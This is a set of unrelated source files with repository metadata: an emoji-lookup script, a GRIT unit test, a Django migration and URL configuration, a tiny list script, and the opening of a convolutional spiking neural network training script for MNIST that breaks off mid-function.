('\U0001F3BF', Category.Sport.name, ['none']) Basketball = ('\U0001F3C0', Category.Sport.name, ['hoop']) ChequeredFlag = ('\U0001F3C1', Category.Sport.name, ['none']) Snowboarder = ('\U0001F3C2', Category.Sport.name, ['none']) Runner = ('\U0001F3C3', Category.Sport.name, ['none']) Surfer = ('\U0001F3C4', Category.Sport.name, ['none']) Trophy = ('\U0001F3C6', Category.Sport.name, ['none']) AmericanFootball = ('\U0001F3C8', Category.Sport.name, ['none']) Swimmer = ('\U0001F3CA', Category.Sport.name, ['none']) House = ('\U0001F3E1', Category.Building.name, ['none']) Office = ('\U0001F3E2', Category.Building.name, ['none']) Hospital = ('\U0001F3E5', Category.Building.name, ['none']) Bank = ('\U0001F3E6', Category.Building.name, ['none']) ATM = ('\U0001F3E7', Category.Building.name, ['none']) Hotel = ('\U0001F3E8', Category.Building.name, ['none']) ConvenienceStore = ('\U0001F3EA', Category.Building.name, ['none']) School = ('\U0001F3EB', Category.Building.name, ['none']) Department = ('\U0001F3EC', Category.Building.name, ['none']) Factory = ('\U0001F3ED', Category.Building.name, ['none']) Snail = ('\U0001F40C', Category.Animal.name, ['none']) Snake = ('\U0001F40D', Category.Animal.name, ['none']) Horse = ('\U0001F40E', Category.Animal.name, ['none']) Sheep = ('\U0001F411', Category.Animal.name, ['none']) Monkey = ('\U0001F412', Category.Animal.name, ['none']) Chicken = ('\U0001F414', Category.Animal.name, ['none']) Boar = ('\U0001F417', Category.Animal.name, ['none']) Elephant = ('\U0001F418', Category.Animal.name, ['none']) Octopus = ('\U0001F419', Category.Animal.name, ['none']) SpiralShell = ('\U0001F41A', Category.Animal.name, ['none']) Bug = ('\U0001F41B', Category.Animal.name, ['none']) Ant = ('\U0001F41C', Category.Animal.name, ['none']) Honeybee = ('\U0001F41D', Category.Animal.name, ['none']) LadyBeetle = ('\U0001F41E', Category.Animal.name, ['none']) Fish = ('\U0001F41F', Category.Animal.name, ['none']) TropicalFish = ('\U0001F420', Category.Animal.name, ['none']) Blowfish = ('\U0001F421', Category.Animal.name, ['none']) Turtle = ('\U0001F422', Category.Animal.name, ['none']) HatchingChick = ('\U0001F423', Category.Animal.name, ['none']) BabyChick = ('\U0001F424', Category.Animal.name, ['none']) Bird = ('\U0001F426', Category.Animal.name, ['none']) Penguin = ('\U0001F427', Category.Animal.name, ['none']) Koala = ('\U0001F428', Category.Animal.name, ['none']) Poodle = ('\U0001F429', Category.Animal.name, ['none']) Dolphin = ('\U0001F42C', Category.Animal.name, ['none']) MouseFace = ('\U0001F42D', Category.Animal.name, ['none']) CowFace = ('\U0001F42E', Category.Animal.name, ['none']) TigerFace = ('\U0001F42F', Category.Animal.name, ['none']) RabbitFace = ('\U0001F430', Category.Animal.name, ['none']) CatFace = ('\U0001F431', Category.Animal.name, ['none']) DragonFace = ('\U0001F432', Category.Animal.name, ['none']) SpoutingWhale = ('\U0001F433', Category.Animal.name, ['none']) HorseFace = ('\U0001F434', Category.Animal.name, ['none']) MonkeyFace = ('\U0001F435', Category.Animal.name, ['none']) DogFace = ('\U0001F436', Category.Animal.name, ['none']) PigFace = ('\U0001F437', Category.Animal.name, ['none']) FrogFace = ('\U0001F438', Category.Animal.name, ['none']) HamsterFace = ('\U0001F439', Category.Animal.name, ['none']) WolfFace = ('\U0001F43A', Category.Animal.name, ['none']) BearFace = ('\U0001F43B', Category.Animal.name, ['none']) PandaFace = ('\U0001F43C', Category.Animal.name, ['none']) PigNose = ('\U0001F43D', Category.Animal.name, ['none']) PawPrints = ('\U0001F43E', Category.Animal.name, ['none']) Eyes = ('\U0001F440', Category.Features.name, ['none']) Ear = ('\U0001F442', Category.Features.name, ['none']) Nose = ('\U0001F443', Category.Features.name, ['none']) Mouth = ('\U0001F444', Category.Features.name, ['none']) Tongue = ('\U0001F445', Category.Features.name, ['none']) Up = ('\U0001F446', Category.Direction.name, ['none']) Down = ('\U0001F447', Category.Direction.name, ['none']) Left = ('\U0001F448', Category.Direction.name, ['none']) Right = ('\U0001F449', Category.Direction.name, ['none']) FistedHand = ('\U0001F44A', Category.Hand.name, ['none']) WavingHand = ('\U0001F44B', Category.Hand.name, ['none']) OK = ('\U0001F44C', Category.Hand.name, ['none']) ThumbsUp = ('\U0001F44D', Category.Hand.name, ['none']) ThumbsDown = ('\U0001F44E', Category.Hand.name, ['none']) ClappingHands = ('\U0001F44F', Category.Hand.name, ['none']) OpenHands = ('\U0001F450', Category.Hand.name, ['none']) Crown = ('\U0001F451', Category.Others.name, ['none']) Eyeglasses = ('\U0001F453', Category.Others.name, ['none']) Necktie = ('\U0001F454', Category.Others.name, ['none']) Tshirt = ('\U0001F455', Category.Others.name, ['none']) Jeans = ('\U0001F456', Category.Others.name, ['none']) Dress = ('\U0001F457', Category.Others.name, ['none']) Kimono = ('\U0001F458', Category.Others.name, ['none']) Bikini = ('\U0001F459', Category.Others.name, ['none']) WomansClothes = ('\U0001F45A', Category.Others.name, ['none']) Purse = ('\U0001F45B', Category.Others.name, ['none']) Handbag = ('\U0001F45C', Category.Others.name, ['none']) Pouch = ('\U0001F45D', Category.Others.name, ['none']) MansShoe = ('\U0001F45E', Category.Others.name, ['none']) AthleticShoe = ('\U0001F45F', Category.Others.name, ['none']) HighHeeledShoe = ('\U0001F460', Category.Others.name, ['none']) SandalShoe = ('\U0001F461', Category.Others.name, ['none']) BootsShoe = ('\U0001F462', Category.Others.name, ['none']) Footprints = ('\U0001F463', Category.Others.name, ['none']) Boy = ('\U0001F466', Category.People.name, ['none']) Girl = ('\U0001F467', Category.People.name, ['none']) Man = ('\U0001F468', Category.People.name, ['none']) Woman = ('\U0001F469', Category.People.name, ['none']) Family = ('\U0001F46A', Category.People.name, ['none']) Couple = ('\U0001F46B', Category.People.name, ['none']) Police = ('\U0001F46E', Category.People.name, ['officer']) Bride = ('\U0001F470', Category.People.name, ['none']) Baby = ('\U0001F476', Category.People.name, ['infant']) Princess = ('\U0001F478', Category.People.name, ['none']) Ghost = ('\U0001F47B', Category.Others.name, ['none']) Skull = ('\U0001F480', Category.Others.name, ['none']) Guardsman = ('\U0001F482', Category.People.name, ['none']) Dancer = ('\U0001F483', Category.People.name, ['none']) Lipstick = ('\U0001F484', Category.Others.name, ['none']) Syringe = ('\U0001F489', Category.Others.name, ['none']) Pill = ('\U0001F48A', Category.Others.name, ['none']) Ring = ('\U0001F48D', Category.Others.name, ['none']) Gem = ('\U0001F48E', Category.Others.name, ['none']) BrokenHeart = ('\U0001F494', Category.Others.name, ['none']) Heart = ('\U0001F49C', Category.Others.name, ['none']) Bulb = ('\U0001F4A1', Category.Others.name, ['light']) Anger = ('\U0001F4A2', Category.Others.name, ['none']) Bomb = ('\U0001F4A3', Category.Others.name, ['none']) Sleeping = ('\U0001F4A4', Category.Others.name, ['none']) PileOfPoo = ('\U0001F4A9', Category.Others.name, ['none']) Money = ('\U0001F4B0', Category.Others.name, ['none']) CreditCard = ('\U0001F4B3', Category.Others.name, ['none']) Computer = ('\U0001F4BB', Category.Others.name, ['none']) Disk = ('\U0001F4BE', Category.Others.name, ['none']) Calendar = ('\U0001F4C5', Category.Others.name, ['none']) Clipboard = ('\U0001F4CB', Category.Others.name, ['none']) Pushpin = ('\U0001F4CC', Category.Others.name, ['none']) Paperclip = ('\U0001F4CE', Category.Others.name, ['none']) Notebook = ('\U0001F4D3', Category.Others.name, ['none']) Memo = ('\U0001F4DD', Category.Others.name, ['none']) Postbox = ('\U0001F4EE', Category.Others.name, ['none']) Newspaper = ('\U0001F4F0', Category.Others.name, ['none']) Mobile = ('\U0001F4F1', Category.Others.name, ['phone']) Television = ('\U0001F4FA', Category.Others.name, ['none']) Radio = ('\U0001F4FB', Category.Others.name, ['none']) Plug = ('\U0001F50C', Category.Others.name, ['none']) Key = ('\U0001F511', Category.Others.name, ['none']) Lock = ('\U0001F512', Category.Others.name, ['none']) Bell = ('\U0001F514', Category.Others.name, ['none']) Button = ('\U0001F518', Category.Others.name, ['none']) Wrench = ('\U0001F527', Category.Others.name, ['none']) Hammer = ('\U0001F528', Category.Others.name, ['none']) Pistol = ('\U0001F52B', Category.Others.name, ['gun']) #transfer enter words to Emoji def to_emoji(enter): flag = False for emoji in Emoji: #find the corresponding word at Emoji.name if(enter.find(emoji.name.lower()) >= 0 ): flag = True print((emoji.value)[0]) break #find the corresponding word at Emoji.value[2] which is extra description emotion_tup = emoji.value for description in emotion_tup[2]: if(enter.find(description) >= 0 or description.find(enter) >=0): flag = True print((emoji.value)[0]) break if flag: break if flag is not True: #random select from the emoji list with same category emoji_list = searchCategory(enter) if(len(emoji_list)>0): flag =True print(random.choice(emoji_list)) # default emoji if no corresponding emoji can be found if flag is not True: print('\U0001F631') #find the corresponding word at category name def searchCategory(enter): emoji_list = [] for emoji in Emoji: category=(emoji.value)[1] if(category.lower().find(enter) >=0): emoji_list.append((emoji.value)[0]) return emoji_list while True: enter = input("Please key in here :") if enter=='': break to_emoji(enter.lower())
624253db8803ba4e60460ddc4c11d392b0bac60d
297497957c531d81ba286bc91253fbbb78b4d8be
/third_party/libwebrtc/tools/grit/grit/tool/postprocess_unittest.py
21ca5e2f774610e4a7efa36f398ec1fb87b4cddc
[ "BSD-3-Clause", "LicenseRef-scancode-unknown-license-reference" ]
permissive
marco-c/gecko-dev-comments-removed
7a9dd34045b07e6b22f0c636c0a836b9e639f9d3
61942784fb157763e65608e5a29b3729b0aa66fa
refs/heads/master
2023-08-09T18:55:25.895853
2023-08-01T00:40:39
2023-08-01T00:40:39
211,297,481
0
0
NOASSERTION
2019-09-29T01:27:49
2019-09-27T10:44:24
C++
UTF-8
Python
false
false
1,705
py
'''Unit test that checks postprocessing of files. Tests postprocessing by having the postprocessor modify the grd data tree, changing the message name attributes. ''' from __future__ import print_function import os import re import sys if __name__ == '__main__': sys.path.append(os.path.join(os.path.dirname(__file__), '../..')) import unittest import grit.tool.postprocess_interface from grit.tool import rc2grd class PostProcessingUnittest(unittest.TestCase): def testPostProcessing(self): rctext = '''STRINGTABLE BEGIN DUMMY_STRING_1 "String 1" // Some random description DUMMY_STRING_2 "This text was added during preprocessing" END ''' tool = rc2grd.Rc2Grd() class DummyOpts(object): verbose = False extra_verbose = False tool.o = DummyOpts() tool.post_process = 'grit.tool.postprocess_unittest.DummyPostProcessor' result = tool.Process(rctext, '.\resource.rc') self.failUnless( result.children[2].children[2].children[0].attrs['name'] == 'SMART_STRING_1') self.failUnless( result.children[2].children[2].children[1].attrs['name'] == 'SMART_STRING_2') class DummyPostProcessor(grit.tool.postprocess_interface.PostProcessor): ''' Post processing replaces all message name attributes containing "DUMMY" to "SMART". ''' def Process(self, rctext, rcpath, grdnode): smarter = re.compile(r'(DUMMY)(.*)') messages = grdnode.children[2].children[2] for node in messages.children: name_attr = node.attrs['name'] m = smarter.search(name_attr) if m: node.attrs['name'] = 'SMART' + m.group(2) return grdnode if __name__ == '__main__': unittest.main()
7dc45d66e98d4d7f6520c961a275e8f2cca368d4
80ab3312d7bbe514d1e7b3452fdd9c25d542f079
/collection/list/converting2.py
b5fb44d42103d62a6f045095b5aacbbefcdca91a
[]
no_license
krishnanandk/kkprojects
2e7e993475b10696b05873a15df997ddf46931a1
dd5d96ad7af9f8632648e833fcae87951ca431de
refs/heads/master
2023-04-09T04:08:23.077215
2021-04-19T04:56:11
2021-04-19T04:56:11
359,332,372
0
0
null
null
null
null
UTF-8
Python
false
false
94
py
lst=[5,10,20] print(lst) lst1=[] sum=sum(lst) for i in lst: lst1.append(sum-i) print(lst1)
f2744c340d84c765a7f38427e107dcf0e0339605
6ba72ce01fe8c08a10a7607536858cfd40b2dc16
/kirppuauth/migrations/0001_initial.py
a501f184d3eaff89282c7871370678d0bb60b7eb
[ "MIT" ]
permissive
jlaunonen/kirppu
dcafc5537d325b2605daf98cdde4115a759dd2ce
fb694a0d1f827f4f4aae870589eb4e57ddf9bc97
refs/heads/master
2023-07-20T03:13:10.814349
2023-07-14T16:46:55
2023-07-14T16:46:55
18,244,187
0
6
MIT
2023-01-10T20:48:08
2014-03-29T15:36:30
Python
UTF-8
Python
false
false
2,830
py
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations import django.utils.timezone import django.core.validators class Migration(migrations.Migration): dependencies = [ ('auth', '0001_initial'), ] operations = [ migrations.CreateModel( name='User', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('password', models.CharField(max_length=128, verbose_name='password')), ('last_login', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last login')), ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')), ('username', models.CharField(help_text='Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only.', unique=True, max_length=30, verbose_name='username', validators=[django.core.validators.RegexValidator('^[\\w.@+-]+$', 'Enter a valid username.', 'invalid')])), ('first_name', models.CharField(max_length=30, verbose_name='first name', blank=True)), ('last_name', models.CharField(max_length=30, verbose_name='last name', blank=True)), ('email', models.EmailField(max_length=75, verbose_name='email address', blank=True)), ('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')), ('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')), ('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')), ('phone', models.CharField(max_length=64)), ('last_checked', models.DateTimeField(auto_now_add=True)), ('groups', models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Group', blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of his/her group.', verbose_name='groups')), ('user_permissions', models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Permission', blank=True, help_text='Specific permissions for this user.', verbose_name='user permissions')), ], options={ 'abstract': False, 'verbose_name': 'user', 'verbose_name_plural': 'users', }, bases=(models.Model,), ), ]
1f41f472eff20d97f50cfe622768cb7a07752ec7
ded41c1a9337c4194ef8a07951bd7c21b342f174
/healthillc/urls.py
8064a8959457eed39ec1433cd7f2e4337001ec26
[]
no_license
rasikraj01/healthillc
f9a2c175245cbf50f193f7f8b4c232a55bd14980
b452fdcbad0e577f8160db769918689b940ae982
refs/heads/master
2022-12-10T08:19:19.656197
2020-02-06T18:52:18
2020-02-06T18:52:18
238,709,132
1
0
null
2022-11-22T05:17:46
2020-02-06T14:37:13
HTML
UTF-8
Python
false
false
1,780
py
from django.conf.urls import url from django.conf import settings from django.conf.urls.static import static from django.urls import path, include from django.contrib import admin from django.contrib.auth.views import LoginView, LogoutView, PasswordResetView, PasswordResetDoneView, PasswordResetCompleteView, PasswordResetConfirmView from users.views import Dashboard, Register, Plans, Checkout from users import views urlpatterns = [ url(r'^admin/', admin.site.urls), path('', include('about.urls')), path('plans/', Plans.as_view(), name='plans'), path('dashboard/', Dashboard.as_view(), name='dashboard'), path('checkout', Checkout.as_view(), name='checkout'), # path('request/', Request.as_view(), name='request'), path('response/', views.response, name='response'), #path('notify/', views.notification_email, name='notification_email'), path('register/', Register.as_view(), name='register'), path('login/', LoginView.as_view(template_name='users/login.html'), name="login"), path('logout/', LogoutView.as_view(template_name='users/logout.html'), name="logout"), path('password-reset/', PasswordResetView.as_view(template_name='users/password_reset.html'), name='password_reset'), path('password-reset/done/', PasswordResetDoneView.as_view(template_name='users/password_reset_done.html'), name='password_reset_done'), path('password-reset-confirm/<uidb64>/<token>/', PasswordResetConfirmView.as_view(template_name='users/password_reset_confirm.html'), name='password_reset_confirm'), path('password-reset-complete/', PasswordResetCompleteView.as_view(template_name='users/password_reset_complete.html'), name='password_reset_complete') ]
595eacd1e61bf19c94b33e3e829d75688a0ceefb
ecb21f6dd5d49b44826974a1c06357a8405aa89e
/code/train/csnn_two_level_inhibition.py
e9cbb3ff928be0a7613608bfd7d116895e9fcef6
[]
no_license
gumpfly/stdp-mnist
9924279014e66cb26fab75f1136f38fd05d8fa3e
03c32a47e9cd6fe8f902d134c2aa1d04bff037aa
refs/heads/master
2021-08-15T11:30:13.544379
2017-11-17T18:59:49
2017-11-17T18:59:49
null
0
0
null
null
null
null
UTF-8
Python
false
false
55,633
py
''' Convolutional spiking neural network training, testing, and evaluation script. Evaluation can be done outside of this script; however, it is most straightforward to call this script with mode=train, then mode=test on HPC systems, where in the test mode, the network evaluation is written to disk. ''' import warnings warnings.filterwarnings('ignore') import matplotlib.cm as cmap import brian_no_units import networkx as nx import cPickle as p import pandas as pd import numpy as np import brian as b import argparse import random import timeit import time import math import os from mpl_toolkits.axes_grid1 import make_axes_locatable from scipy.spatial.distance import euclidean from sklearn.metrics import confusion_matrix from struct import unpack from brian import * from util import * np.set_printoptions(threshold=np.nan, linewidth=200) # only show log messages of level ERROR or higher b.log_level_error() # set these appropriate to your directory structure top_level_path = os.path.join('..', '..') MNIST_data_path = os.path.join(top_level_path, 'data') model_name = 'csnn_two_level_inhibition' results_path = os.path.join(top_level_path, 'results', model_name) performance_dir = os.path.join(top_level_path, 'performance', model_name) activity_dir = os.path.join(top_level_path, 'activity', model_name) deltas_dir = os.path.join(top_level_path, 'deltas', model_name) spikes_dir = os.path.join(top_level_path, 'spikes', model_name) weights_dir = os.path.join(top_level_path, 'weights', model_name) best_weights_dir = os.path.join(weights_dir, 'best') end_weights_dir = os.path.join(weights_dir, 'end') assignments_dir = os.path.join(top_level_path, 'assignments', model_name) best_assignments_dir = os.path.join(assignments_dir, 'best') end_assignments_dir = os.path.join(assignments_dir, 'end') misc_dir = os.path.join(top_level_path, 'misc', model_name) best_misc_dir = os.path.join(misc_dir, 'best') end_misc_dir = os.path.join(misc_dir, 'end') for d in [ performance_dir, activity_dir, weights_dir, deltas_dir, misc_dir, best_misc_dir, assignments_dir, best_assignments_dir, MNIST_data_path, results_path, best_weights_dir, end_weights_dir, end_misc_dir, end_assignments_dir, spikes_dir ]: if not os.path.isdir(d): os.makedirs(d) def normalize_weights(): ''' Squash the input to excitatory synaptic weights to sum to a prespecified number. ''' for conn_name in input_connections: connection = input_connections[conn_name][:].todense() for feature in xrange(conv_features): feature_connection = connection[:, feature * n_e : (feature + 1) * n_e] column_sums = np.sum(np.asarray(feature_connection), axis=0) column_factors = weight['ee_input'] / column_sums for n in xrange(n_e): dense_weights = input_connections[conn_name][:, feature * n_e + n].todense() dense_weights[convolution_locations[n]] *= column_factors[n] input_connections[conn_name][:, feature * n_e + n] = dense_weights def plot_input(rates): ''' Plot the current input example during the training procedure. ''' fig = plt.figure(fig_num, figsize = (5, 5)) im = plt.imshow(rates.reshape((28, 28)), interpolation='nearest', vmin=0, vmax=64, cmap='binary') plt.colorbar(im) plt.title('Current input example') fig.canvas.draw() return im, fig def update_input(rates, im, fig): ''' Update the input image to use for input plotting. ''' im.set_array(rates.reshape((28, 28))) fig.canvas.draw() return im def update_assignments_plot(assignments, im): im.set_array(assignments.reshape((int(np.sqrt(n_e_total)), int(np.sqrt(n_e_total)))).T) return im def get_2d_input_weights(): ''' Get the weights from the input to excitatory layer and reshape it to be two dimensional and square. ''' # specify the desired shape of the reshaped input -> excitatory weights rearranged_weights = np.zeros((conv_features * conv_size, conv_size * n_e)) # get the input -> excitatory synaptic weights connection = input_connections['XeAe'][:] for n in xrange(n_e): for feature in xrange(conv_features): temp = connection[:, feature * n_e + (n // n_e_sqrt) * n_e_sqrt + (n % n_e_sqrt)].todense() rearranged_weights[ feature * conv_size : (feature + 1) * conv_size, n * conv_size : (n + 1) * conv_size ] = \ temp[convolution_locations[n]].reshape((conv_size, conv_size)) if n_e == 1: ceil_sqrt = int(math.ceil(math.sqrt(conv_features))) square_weights = np.zeros((28 * ceil_sqrt, 28 * ceil_sqrt)) for n in xrange(conv_features): square_weights[(n // ceil_sqrt) * 28 : ((n // ceil_sqrt) + 1) * 28, (n % ceil_sqrt) * 28 : ((n % ceil_sqrt) + 1) * 28] = rearranged_weights[n * 28 : (n + 1) * 28, :] return square_weights.T else: square_weights = np.zeros((conv_size * features_sqrt * n_e_sqrt, conv_size * features_sqrt * n_e_sqrt)) for n_1 in xrange(n_e_sqrt): for n_2 in xrange(n_e_sqrt): for f_1 in xrange(features_sqrt): for f_2 in xrange(features_sqrt): square_weights[conv_size * (n_2 * features_sqrt + f_2) : conv_size * (n_2 * features_sqrt + f_2 + 1), \ conv_size * (n_1 * features_sqrt + f_1) : conv_size * (n_1 * features_sqrt + f_1 + 1)] = \ rearranged_weights[(f_1 * features_sqrt + f_2) * conv_size : (f_1 * features_sqrt + f_2 + 1) * conv_size, \ (n_1 * n_e_sqrt + n_2) * conv_size : (n_1 * n_e_sqrt + n_2 + 1) * conv_size] return square_weights.T def get_input_weights(weight_matrix): ''' Get the weights from the input to excitatory layer and reshape it to be two dimensional and square. ''' weights = [] # for each convolution feature for feature in xrange(conv_features): # for each excitatory neuron in this convolution feature for n in xrange(n_e): temp = weight_matrix[:, feature * n_e + (n // n_e_sqrt) * n_e_sqrt + (n % n_e_sqrt)] weights.append(np.ravel(temp[convolution_locations[n]])) # return the rearranged weights to display to the user return weights def plot_weights_and_assignments(assignments): ''' Plot the weights from input to excitatory layer to view during training. ''' weights = get_2d_input_weights() fig = plt.figure(fig_num, figsize=(18, 9)) ax1 = plt.subplot(121) image1 = ax1.imshow(weights, interpolation='nearest', vmin=0, vmax=wmax_ee, cmap=cmap.get_cmap('hot_r')) ax1.set_title(ending.replace('_', ' ')) ax2 = plt.subplot(122) color = plt.get_cmap('RdBu', 11) reshaped_assignments = assignments.reshape((int(np.sqrt(n_e_total)), int(np.sqrt(n_e_total)))).T image2 = ax2.matshow(reshaped_assignments, cmap=color, vmin=-1.5, vmax=9.5) ax2.set_title('Neuron labels') divider1 = make_axes_locatable(ax1) divider2 = make_axes_locatable(ax2) cax1 = divider1.append_axes("right", size="5%", pad=0.05) cax2 = divider2.append_axes("right", size="5%", pad=0.05) plt.colorbar(image1, cax=cax1) plt.colorbar(image2, cax=cax2, ticks=np.arange(-1, 10)) if n_e != 1: ax1.set_xticks(xrange(conv_size, conv_size * n_e_sqrt * features_sqrt + 1, conv_size), xrange(1, conv_size * n_e_sqrt * features_sqrt + 1)) ax1.set_yticks(xrange(conv_size, conv_size * n_e_sqrt * features_sqrt + 1, conv_size), xrange(1, conv_size * n_e_sqrt * features_sqrt + 1)) for pos in xrange(conv_size * features_sqrt, conv_size * features_sqrt * n_e_sqrt, conv_size * features_sqrt): ax1.axhline(pos) ax1.axvline(pos) else: ax1.set_xticks(xrange(conv_size, conv_size * (int(np.sqrt(conv_features)) + 1), conv_size), xrange(1, int(np.sqrt(conv_features)) + 1)) ax1.set_yticks(xrange(conv_size, conv_size * (int(np.sqrt(conv_features)) + 1), conv_size), xrange(1, int(np.sqrt(conv_features)) + 1)) plt.tight_layout() fig.canvas.draw() return fig, ax1, ax2, image1, image2 def update_weights_and_assignments(fig, ax1, ax2, im1, im2, assignments, spike_counts): ''' Update the plot of the weights from input to excitatory layer to view during training. ''' weights = get_2d_input_weights() im1.set_array(weights) reshaped_assignments = assignments.reshape((int(np.sqrt(n_e_total)), int(np.sqrt(n_e_total)))).T im2.set_array(reshaped_assignments) for txt in ax2.texts: txt.set_visible(False) spike_counts_reshaped = spike_counts.reshape([features_sqrt, features_sqrt]) for x in xrange(features_sqrt): for y in xrange(features_sqrt): c = spike_counts_reshaped[x, y] if c > 0: ax2.text(x, y, str(c), va='center', ha='center', weight='heavy', fontsize=16) else: ax2.text(x, y, '', va='center', ha='center') fig.canvas.draw() def get_current_performance(performances, current_example_num): ''' Evaluate the performance of the network on the past 'update_interval' training examples. ''' global input_numbers current_evaluation = int(current_example_num / update_interval) if current_example_num == num_examples -1: current_evaluation+=1 start_num = current_example_num - update_interval end_num = current_example_num wrong_idxs = {} wrong_labels = {} for scheme in performances.keys(): difference = output_numbers[scheme][start_num : end_num, 0] - input_numbers[start_num : end_num] correct = len(np.where(difference == 0)[0]) wrong_idxs[scheme] = np.where(difference != 0)[0] wrong_labels[scheme] = output_numbers[scheme][start_num : end_num, 0][np.where(difference != 0)[0]] performances[scheme][current_evaluation] = correct / float(update_interval) * 100 return performances, wrong_idxs, wrong_labels def plot_performance(fig_num, performances, num_evaluations): ''' Set up the performance plot for the beginning of the simulation. ''' time_steps = range(0, num_evaluations) fig = plt.figure(fig_num, figsize = (12, 4)) fig_num += 1 for performance in performances: plt.plot(time_steps[:np.size(np.nonzero(performances[performance]))], \ np.extract(np.nonzero(performances[performance]), performances[performance]), label=performance) lines = plt.gca().lines plt.ylim(ymax=100) plt.xticks(xrange(0, num_evaluations + 10, 10), xrange(0, ((num_evaluations + 10) * update_interval), 10)) plt.legend() plt.grid(True) plt.title('Classification performance per update interval') fig.canvas.draw() return lines, fig_num, fig def update_performance_plot(lines, performances, current_example_num, fig): ''' Update the plot of the performance based on results thus far. ''' performances, wrong_idxs, wrong_labels = get_current_performance(performances, current_example_num) for line, performance in zip(lines, performances): line.set_xdata(range((current_example_num / update_interval) + 1)) line.set_ydata(performances[performance][:(current_example_num / update_interval) + 1]) fig.canvas.draw() return lines, performances, wrong_idxs, wrong_labels def plot_deltas(fig_num, deltas, num_weight_updates): ''' Set up the performance plot for the beginning of the simulation. ''' time_steps = range(0, num_weight_updates) fig = plt.figure(fig_num, figsize = (12, 4)) fig_num += 1 plt.plot([], [], label='Absolute difference in weights') lines = plt.gca().lines plt.ylim(ymin=0, ymax=conv_size*n_e_total) plt.xticks(xrange(0, num_weight_updates + weight_update_interval, 100), \ xrange(0, ((num_weight_updates + weight_update_interval) * weight_update_interval), 100)) plt.legend() plt.grid(True) plt.title('Absolute difference in weights per weight update interval') fig.canvas.draw() return lines[0], fig_num, fig def update_deltas_plot(line, deltas, current_example_num, fig): ''' Update the plot of the performance based on results thus far. ''' delta = deltas[int(current_example_num / weight_update_interval)] line.set_xdata(range(int(current_example_num / weight_update_interval) + 1)) ydata = list(line.get_ydata()) ydata.append(delta) line.set_ydata(ydata) fig.canvas.draw() return line, deltas def predict_label(assignments, spike_rates, accumulated_rates, spike_proportions): ''' Given the label assignments of the excitatory layer and their spike rates over the past 'update_interval', get the ranking of each of the categories of input. ''' output_numbers = {} for scheme in voting_schemes: summed_rates = [0] * 10 num_assignments = [0] * 10 if scheme == 'all': for i in xrange(10): num_assignments[i] = len(np.where(assignments == i)[0]) if num_assignments[i] > 0: summed_rates[i] = np.sum(spike_rates[assignments == i]) / num_assignments[i] elif scheme == 'all_active': for i in xrange(10): num_assignments[i] = len(np.where(assignments == i)[0]) if num_assignments[i] > 0: summed_rates[i] = np.sum(np.nonzero(spike_rates[assignments == i])) / num_assignments[i] elif scheme == 'activity_neighborhood': for i in xrange(10): num_assignments[i] = len(np.where(assignments == i)[0]) if num_assignments[i] > 0: for idx in np.where(assignments == i)[0]: if np.sum(spike_rates[idx]) != 0: neighbors = [idx] neighbors.extend(get_neighbors(idx, features_sqrt)) summed_rates[i] += np.sum(spike_rates[neighbors]) / \ np.size(np.nonzero(spike_rates[neighbors].ravel())) elif scheme == 'most_spiked_neighborhood': neighborhood_activity = np.zeros([conv_features, n_e]) most_spiked_array = np.array(np.zeros((conv_features, n_e)), dtype=bool) for i in xrange(10): num_assignments[i] = len(np.where(assignments == i)[0]) if num_assignments[i] > 0: for idx in np.where(assignments == i)[0]: if np.sum(spike_rates[idx]) != 0: neighbors = [idx] neighbors.extend(get_neighbors(idx, features_sqrt)) if np.size(np.nonzero(spike_rates[neighbors])) > 0: neighborhood_activity[idx] = np.sum(spike_rates[neighbors]) / \ np.size(np.nonzero(spike_rates[neighbors].ravel())) for n in xrange(n_e): # find the excitatory neuron which spiked the most in this input location most_spiked_array[np.argmax(neighborhood_activity[:, n : n + 1]), n] = True # for each label for i in xrange(10): # get the number of label assignments of this type num_assignments[i] = len(np.where(assignments[most_spiked_array] == i)[0]) if len(spike_rates[np.where(assignments[most_spiked_array] == i)]) > 0: # sum the spike rates of all excitatory neurons with this label, which fired the most in its patch summed_rates[i] = np.sum(spike_rates[np.where(np.logical_and(assignments == i, most_spiked_array))]) / float(np.sum(spike_rates[most_spiked_array])) elif scheme == 'most_spiked_patch': most_spiked_array = np.array(np.zeros((conv_features, n_e)), dtype=bool) for feature in xrange(conv_features): # count up the spikes for the neurons in this convolution patch column_sums = np.sum(spike_rates[feature : feature + 1, :], axis=0) # find the excitatory neuron which spiked the most most_spiked_array[feature, np.argmax(column_sums)] = True # for each label for i in xrange(10): # get the number of label assignments of this type num_assignments[i] = len(np.where(assignments[most_spiked_array] == i)[0]) if len(spike_rates[np.where(assignments[most_spiked_array] == i)]) > 0: # sum the spike rates of all excitatory neurons with this label, which fired the most in its patch summed_rates[i] = np.sum(spike_rates[np.where(np.logical_and(assignments == i, most_spiked_array))]) / float(np.sum(spike_rates[most_spiked_array])) elif scheme == 'most_spiked_location': most_spiked_array = np.array(np.zeros((conv_features, n_e)), dtype=bool) for n in xrange(n_e): # find the excitatory neuron which spiked the most in this input location most_spiked_array[np.argmax(spike_rates[:, n : n + 1]), n] = True # for each label for i in xrange(10): # get the number of label assignments of this type num_assignments[i] = len(np.where(assignments[most_spiked_array] == i)[0]) if len(spike_rates[np.where(assignments[most_spiked_array] == i)]) > 0: # sum the spike rates of all excitatory neurons with this label, which fired the most in its patch summed_rates[i] = np.sum(spike_rates[np.where(np.logical_and(assignments == i, most_spiked_array))]) / float(np.sum(spike_rates[most_spiked_array])) elif scheme == 'confidence_weighting': for i in xrange(10): num_assignments[i] = np.count_nonzero(assignments == i) if num_assignments[i] > 0: summed_rates[i] = np.sum(spike_rates[assignments == i] * spike_proportions[(assignments == i).ravel(), i]) / num_assignments[i] output_numbers[scheme] = np.argsort(summed_rates)[::-1] return output_numbers def assign_labels(result_monitor, input_numbers, accumulated_rates, accumulated_inputs): ''' 